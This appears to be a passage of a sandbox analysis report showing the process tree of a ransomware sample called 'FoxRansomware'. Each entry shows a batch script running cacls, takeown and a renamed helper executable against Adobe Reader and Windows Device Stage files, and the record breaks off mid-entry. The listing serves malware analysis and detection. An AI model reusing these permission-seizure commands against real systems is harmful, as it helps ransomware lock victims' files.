  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4500)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "zdingbat.txt" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 2348)
      NDS5iFeg.exe -accepteula "zdingbat.txt" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4356)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4380)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4392)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4420)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4400)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "TURKISH.TXT" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4652)
      NDS5iFeg.exe -accepteula "TURKISH.TXT" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 1228)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4428)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4608)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4600)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4448)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "LogTransport2.exe" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4496)
      NDS5iFeg.exe -accepteula "LogTransport2.exe" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4528)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4548)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4556)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4756)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4792)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "bl.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4768)
      NDS5iFeg.exe -accepteula "bl.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4840)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4824)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4764)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4752)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4760)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "forms_super.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4888)
      NDS5iFeg.exe -accepteula "forms_super.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4984)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4796)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4944)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4952)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4964)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_browser.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4996)
      NDS5iFeg.exe -accepteula "review_browser.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5024)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4936)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5060)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5104)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5132)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tl.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5108)
      NDS5iFeg.exe -accepteula "tl.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3944)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5056)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5160)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5228)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5200)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Identity-V" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5204)
      NDS5iFeg.exe -accepteula "Identity-V" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5144)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5284)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5312)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5288)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5336)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5324)
      NDS5iFeg.exe -accepteula "MyriadPro-Bold.otf" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5252)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6656)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5884)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6684)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 6688)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SC_Reader.exe" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5264)
      NDS5iFeg.exe -accepteula "SC_Reader.exe" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6700)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5448)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5464)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5516)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 1312)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt55.ths" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5492)
      NDS5iFeg.exe -accepteula "brt55.ths" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5632)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5148)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5704)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5564)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5620)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa03.hsp" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5556)
      NDS5iFeg.exe -accepteula "usa03.hsp" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5740)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5764)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5712)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5560)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5780)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CYRILLIC.TXT" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6996)
      NDS5iFeg.exe -accepteula "CYRILLIC.TXT" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6988)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 7040)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5792)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5788)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5848)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1252.TXT" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5700)
      NDS5iFeg.exe -accepteula "CP1252.TXT" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5732)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5784)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5868)
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5904)
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 5876)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "directories.acrodata" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5576)
      NDS5iFeg.exe -accepteula "directories.acrodata" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5952)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5680)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5912)
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5940)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 2180)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "behavior.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6088)
      NDS5iFeg.exe -accepteula "behavior.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6132)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6004)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 6136)
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6064)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4492)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 7128)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 896)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6000)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 2228)
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5844)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 2660)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6032)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 1944)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6168)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 6160)
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6212)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 6060)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "overlay.png" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6052)
      NDS5iFeg.exe -accepteula "overlay.png" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 7092)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6268)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 6224)
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6272)
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 204)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 7156)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 5512)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5476)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 5504)
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 236)
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 6244)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6428)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6452)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6384)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 6400)
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6520)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 6504)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "watermark.png" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6252)
      NDS5iFeg.exe -accepteula "watermark.png" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6420)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 1276)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 1496)
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6568)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 6668)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 2056)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6580)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 5924)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 6596)
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 6936)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 2052)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 1260)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6744)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6708)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 6604)
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 1188)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 6844)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6620)
      NDS5iFeg.exe -accepteula "resource.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 6812)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 6616)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 2376)
